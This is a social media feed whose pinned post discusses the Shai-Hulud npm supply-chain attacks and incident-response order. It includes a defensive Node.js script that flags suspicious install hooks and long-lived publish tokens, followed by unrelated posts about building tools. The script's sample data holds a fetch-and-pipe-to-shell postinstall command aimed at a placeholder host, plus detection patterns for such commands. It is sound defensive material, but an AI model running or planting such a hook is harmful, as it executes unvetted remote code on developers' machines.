Pinned Tweet
The uncomfortable part of the npm supply-chain problem is not that packages can be poisoned. We knew that. The uncomfortable part is that some of our "best practices" assume the attacker is polite enough to stop being dangerous when we revoke their access.

The answer may surprise you... And the answer is bad.

In the Shai-Hulud npm campaigns, compromised packages were not just stealing secrets. They were using those secrets to keep moving.

- GitHub tokens.
- npm tokens.
- Cloud credentials.
- CI/CD secrets.

The kind of things that live in build systems because everything was supposed to be automated, fast, and developer-friendly.

Then came the nastier twist: malware behavior that researchers described as "having a dead man's switch." In some cases, cutting off access too quickly could trigger destructive behavior if the malware was still active and watching its channels disappear.

Which makes the normal incident response reflex weird, fast. "Revoke the token" is still correct. But "revoke the token from an infected host while the malware is still running" may not be the safest first move. That sequence matters.

A poisoned package is not just a bad dependency. It can be an entry point into the developer workstation, the CI runner, the maintainer account, the cloud environment, or the next package maintained by the same person.

That turns dependency hygiene into an executive risk conversation. Not because every CEO needs to know what package-lock.json does. Please no. Some of us are still recovering from explaining DNS.

But leadership does need to understand: If your build pipeline can publish software, deploy infrastructure, and access production-adjacent secrets, then your build pipeline is part of your attack surface. Not a developer convenience. An attack surface.

The practical shift: Stop treating token rotation as the whole playbook. It is one step in a controlled response. A better order looks more like:

1. Isolate the suspected host or runner.
2. Stop automatic installs, builds, and publishes.
3. Preserve enough evidence to understand what ran.
4. Check for persistence, malicious workflows, and poisoned lifecycle scripts.
5. Rotate credentials from a clean environment.
6. Move away from long-lived publish tokens where trusted publishing/OIDC is available.
7. Rebuild affected machines and runners instead of cleaning them with a brave face.

The brave face is where the incident report gets... "spicy."

The bigger lesson is simple: Modern software supply chains are not just about what code you wrote. They are about what code your tools run on your behalf while everyone is trying to move quickly. And sometimes the scariest part of an incident is discovering that the emergency lever is wired to something else.

❓ How are you handling package installs and publishing credentials in CI right now? ❓
✔️ Trusted publishing/OIDC
👛 Short-lived tokens
🚧 Manual release gates
🕶️ "We should probably look at that soon."
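Steps 4 and 6 of the sequence above are the two that are easiest to turn into a repeatable check. What follows is an added example, not code from the original post or from any of the projects it mentions: two small Node.js helpers, one that flags install-time lifecycle scripts (preinstall, install, postinstall, prepare) with dropper-like patterns across a set of package.json manifests, and one that flags a GitHub Actions publish job that still feeds a stored registry token through NODE_AUTH_TOKEN without requesting an OIDC id-token. The sample manifests, the two workflow snippets and the indicator regexes are constructed for illustration; the patterns are triage heuristics, not a signature set.

```javascript
'use strict';
// Added example (not from the original post). Runs offline on constructed input.

// npm runs these hooks automatically when a dependent installs the package.
// `test`, `build` and friends do not run on a consumer's machine, so they are
// out of scope for install-time triage.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristic indicators common in install-time droppers: pulling remote content,
// decoding an embedded payload, running inline code, or piping into a shell.
const SUSPICIOUS_PATTERNS = [
  { id: 'remote-fetch',   re: /\b(curl|wget)\b/ },
  { id: 'inline-node',    re: /\bnode\s+(-e|--eval)\b/ },
  { id: 'base64',         re: /\bbase64\b|atob\(|Buffer\.from\([^)]*['"]base64['"]/ },
  { id: 'pipe-to-shell',  re: /\|\s*(ba)?sh\b/ },
  { id: 'network-module', re: /require\(['"](https?|net|dns)['"]\)/ },
];

// Inspect one parsed package.json. Every lifecycle hook is reported (severity
// 'info') so the reviewer sees all code that runs at install time; hooks that
// match an indicator are raised to 'high'.
function auditLifecycleScripts(name, pkg) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    const hits = SUSPICIOUS_PATTERNS.filter(p => p.re.test(cmd)).map(p => p.id);
    findings.push({ package: name, hook, command: cmd, indicators: hits,
                    severity: hits.length ? 'high' : 'info' });
  }
  return findings;
}

// Audit a map of package name -> parsed package.json (what you would collect by
// walking node_modules on a preserved image). High-severity findings sort first.
function auditManifests(manifests) {
  const all = [];
  for (const [name, pkg] of Object.entries(manifests)) {
    all.push(...auditLifecycleScripts(name, pkg));
  }
  return all.sort((a, b) =>
    a.severity === b.severity ? 0 : (a.severity === 'high' ? -1 : 1));
}

// Step 6 check on a GitHub Actions workflow: a job that runs `npm publish` with
// a stored secret injected as NODE_AUTH_TOKEN, and no `id-token: write`
// permission, is publishing with a long-lived token that any code running on
// the runner (including a poisoned install hook) can read.
function usesLongLivedPublishToken(workflowYaml) {
  const publishes = /\bnpm\s+publish\b/.test(workflowYaml);
  const storedToken = /NODE_AUTH_TOKEN:\s*\$\{\{\s*secrets\./.test(workflowYaml);
  const oidc = /id-token:\s*write/.test(workflowYaml);
  return publishes && storedToken && !oidc;
}

// Constructed sample input: three manifests and two workflow fragments.
const SAMPLE_MANIFESTS = {
  'left-pad-ish': { scripts: { test: 'node test.js' } },
  'native-thing': { scripts: { install: 'node-gyp rebuild' } },
  'evil-helper':  { scripts: { postinstall: 'curl -s https://example.invalid/x | bash' } },
};
const SAMPLE_WORKFLOW_LEGACY = `
jobs:
  publish:
    steps:
      - run: npm publish
        env:
          NODE_AUTH_TOKEN: \${{ secrets.NPM_TOKEN }}
`;
const SAMPLE_WORKFLOW_OIDC = `
jobs:
  publish:
    permissions:
      id-token: write
      contents: read
    steps:
      - run: npm publish
`;

const REPORT = auditManifests(SAMPLE_MANIFESTS);
console.log(JSON.stringify(REPORT, null, 2));
console.log('legacy token workflow:', usesLongLivedPublishToken(SAMPLE_WORKFLOW_LEGACY));
console.log('oidc workflow:', usesLongLivedPublishToken(SAMPLE_WORKFLOW_OIDC));
```

Run it with `node` to print the report. In a real response the manifests should come from the preserved image of the affected runner or workstation, not from a live infected host, and step 2 is easiest to make stick with `npm ci --ignore-scripts` while triage is under way, since npm only executes these hooks when scripts are enabled. The OIDC check is a string heuristic over the workflow text; it tells you a stored token is still in play, not that trusted publishing has been configured correctly on the registry side.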

Building software keeps teaching me that half the job is naming things clearly enough that future me does not open the file and immediately start negotiating with himself.
I keep finding old notes for features I was absolutely sure I needed. Then I look at them two weeks later and realize I was just avoiding the hard part. Very rude of past me. Some of the notes were good though, so he is not fully fired.
Every time I think a tool is the problem, it ends up being the workflow. The tool just made the mess easier to see. Rude, but useful.
Local AI models are the first AI trend that feels useful in a very normal way. Less stage-demo magic. More: can this help with messy files without sending the whole project somewhere I have to explain later?
Founders, devs, AI people, spreadsheet people... What are you building today? Apps, automations, calculators, weird useful tools, whatever. Drop it below. I need more stuff to click on while I avoid my own task list.
I keep reminding myself: make the tool useful first. Pretty can wait its turn. Mostly saying this before I spend 40 minutes moving a button three pixels.
I keep opening AI tools expecting magic. Then I remember I still have to know what I actually want. Very rude system, honestly.
Small tools still count. A calculator that saves someone ten minutes. A script that fixes one annoying task. A spreadsheet that finally makes the numbers readable. That counts. Ship it.
Solo founders and indie builders, what did you ship this week? Small updates count. Landing pages count. Weird tools count. Drop it below. I want to see the stuff people are actually making.
Builders and tech people, what are you working on today? Apps, SaaS, spreadsheets, AI tools, little scripts, websites, anything. Drop it below. I want more useful stuff in my feed.
Claude Fable 5 has been out for like two days and people are already shipping full little apps with it. Love that. Hate that. I opened one project folder and needed a minute.
Newsletter link for today: Fail-Safe Friday - 06/12/26 mycomputerspot-security.beeh… Quick security read. Practical risk. Check it out!
Founders, AI devs, tech people, spreadsheet people... What are you working on? Drop the thing below. Half-built tools count. Weird niche products count. Honestly, those are usually the ones I want to click first.
Solo founders and indie hackers, what are you building right now? Apps, spreadsheets, AI tools, websites, half-finished experiments, whatever. Drop it below. I am collecting useful internet rabbit holes for later.
Tech people, I need a better feed. Drop builders, products, tools, or creators I should be paying attention to. Self-promo counts. I am not above clicking on your thing at midnight.
AI devs and tech builders! I need more people in my feed making useful stuff. Apps, SaaS, automations, spreadsheets, weird little tools, all of it. Drop what you're building. Self-promo is allowed because I am not the internet police.
If you're a solo founder building right now, drop your product below. I want to see what people are actually making. Self-promo is allowed. This is me legally permitting it on the internet.
Pixar dropping a Venice cat movie during a timeline full of AI agents and finance drama is good counterprogramming. Sometimes the internet just needs a suspicious little guy on a roof.